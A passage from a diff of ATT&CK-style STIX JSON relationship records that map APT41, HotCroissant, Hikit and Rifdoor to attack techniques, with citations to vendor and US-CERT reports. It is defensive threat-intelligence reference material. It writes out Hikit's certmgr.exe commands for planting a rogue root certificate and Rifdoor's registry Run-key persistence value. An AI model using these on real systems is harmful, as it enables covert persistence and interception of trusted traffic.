+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--4aa86179-d9e9-43dd-b2a2-75e77a832150",
+ "type": "relationship",
+ "modified": "2020-05-01T13:57:23.349Z",
+ "created": "2020-05-01T13:57:23.349Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 Aug 2019",
+ "url": "https://content.fireeye.com/apt-41/rpt-apt41",
+ "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 Aug 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--66d42126-d337-4a00-ae35-d8af7203a6eb",
+ "type": "relationship",
+ "modified": "2020-05-01T14:48:36.806Z",
+ "created": "2020-05-01T14:48:36.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has attempted to install a scheduled task named \u201cJava Maintenance64\u201d on startup to establish persistence.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fa7381ff-f2b8-4878-a9a0-10a703c7a5dd",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.554Z",
+ "created": "2020-05-01T20:05:15.991Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has used the open source UPX executable packer.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--74f14668-7111-4f96-a307-4aac00d91cf4",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.556Z",
+ "created": "2020-05-01T20:05:16.006Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has encrypted strings with single-byte XOR and base64 encoded RC4.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c12c331c-67dd-40be-b2ad-a198c0b92e78",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.557Z",
+ "created": "2020-05-01T20:05:15.997Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ },
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has compressed network communications and encrypted them with a custom stream cipher.(Citation: Carbon Black HotCroissant April 2020)(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--30da2329-c7ee-4ac9-a38d-af79e6c1389c",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.586Z",
+ "created": "2020-05-01T20:32:56.617Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839",
+ "external_references": [
+ {
+ "source_name": "FireEye HIKIT Rootkit Part 2",
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020."
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) uses certmgr.exe -add GlobalSign.cer -c -s -r localMachine Root and certmgr.exe -add GlobalSign.cer -c -s -r localMachineTrustedPublisher to install a self-generated certificate to the local trust store as a root CA and Trusted Publisher.(Citation: FireEye HIKIT Rootkit Part 2)",
+ "relationship_type": "uses",
+ "id": "relationship--9a78f409-0f6b-41fd-a18f-f38366e4703e",
+ "type": "relationship",
+ "modified": "2020-05-13T20:36:49.341Z",
+ "created": "2020-05-04T14:56:53.094Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) can perform dynamic DLL importing and API lookups using LoadLibrary and GetProcAddress on obfuscated strings.(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7066827b-795c-447c-9c07-05765ed1e07b",
+ "type": "relationship",
+ "modified": "2020-05-06T19:28:22.199Z",
+ "created": "2020-05-04T19:13:35.383Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to clean up installed files, delete files, and delete itself from the victim\u2019s machine.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--45310a29-78b6-4863-ab0b-49fd53ef1809",
+ "type": "relationship",
+ "modified": "2020-05-06T19:28:22.178Z",
+ "created": "2020-05-04T19:13:35.449Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) can remotely open applications on the infected host with the ShellExecuteA command.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--98fd9ed1-abf3-4e2f-b071-8aea2dc44a64",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.457Z",
+ "created": "2020-05-04T19:13:35.457Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list the names of all open windows on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c8a01e1c-dac0-4a47-bda3-3b5684bd3d47",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.459Z",
+ "created": "2020-05-04T19:13:35.459Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e3542e4e-6c4d-468a-b11e-462e35dc33f6",
+ "type": "relationship",
+ "modified": "2020-05-05T15:33:17.970Z",
+ "created": "2020-05-04T19:13:35.462Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) can retrieve a list of applications from the SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths registry key.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d07460c8-0d13-4c25-81f7-56e5198f07c5",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.466Z",
+ "created": "2020-05-04T19:13:35.466Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to stop services on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--92e19c14-504e-402f-b755-08358333cda0",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.475Z",
+ "created": "2020-05-04T19:13:35.474Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to upload a file from the command and control (C2) server to the victim machine.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--967c2498-0f51-464f-b5e5-2a0539614033",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.478Z",
+ "created": "2020-05-04T19:13:35.478Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list running processes on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a5720510-fadb-496d-97b5-99cdabb051ab",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.480Z",
+ "created": "2020-05-04T19:13:35.480Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of services on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a88e956c-6c71-47e1-b02c-d4c105542690",
+ "type": "relationship",
+ "modified": "2020-05-06T19:28:22.157Z",
+ "created": "2020-05-04T19:13:35.486Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to download files from the infected host to the command and control (C2) server.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1678d731-c556-4968-aab1-ae745015308f",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.491Z",
+ "created": "2020-05-04T19:13:35.491Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to do real time screen viewing on an infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ee1b1aee-a635-4008-813d-fab125f0b0a5",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.497Z",
+ "created": "2020-05-04T19:13:35.497Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to hide the window for operations performed on a given file.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fbc96b86-2c57-40b6-89f7-d7a755275a45",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.499Z",
+ "created": "2020-05-04T19:13:35.499Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of files in a given directory as well as drives and drive types.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--911d7f27-a32e-45fb-a66b-e7b195023c43",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.503Z",
+ "created": "2020-05-04T19:13:35.503Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to collect the username on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c0f13745-074b-46ba-ae7a-03385ef79d31",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.506Z",
+ "created": "2020-05-04T19:13:35.506Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has created a new registry entry at HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics with a value of C:\\ProgramData\\Initech\\Initech.exe /run.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--52d12577-199c-41a6-92d6-28d26c023aea",
+ "type": "relationship",
+ "modified": "2020-05-05T21:17:34.539Z",
+ "created": "2020-05-05T15:26:30.431Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has added four additional bytes of data upon launching, then saved the changed version as C:\\ProgramData\\Initech\\Initech.exe.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--23b5fd51-bb47-4811-8a38-c768c8fa6b0e",
+ "type": "relationship",
+ "modified": "2020-05-05T21:17:34.608Z",
+ "created": "2020-05-05T15:26:30.438Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has been executed from malicious Excel or Word documents containing macros.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b76d4437-7d55-4369-b262-eb4ca52d6059",
+ "type": "relationship",
+ "modified": "2020-05-05T15:26:30.455Z",
+ "created": "2020-05-05T15:26:30.455Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[Rifdoor](https://attack.mitre.org/software/S0433) has been distributed in e-mails with malicious Excel or Word documents.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7d93f85e-52a1-4771-8378-0fabfd707ece",
+ "type": "relationship",
+ "modified": "2020-05-05T15:26:30.458Z",
+ "created": "2020-05-05T15:26:30.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to identify the IP address of the compromised machine.(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f0f49935-c4e4-4322-8748-2129915950c7",
+ "type": "relationship",
+ "modified": "2020-05-06T19:28:22.318Z",
+ "created": "2020-05-05T15:33:17.774Z"
+ },
+ {
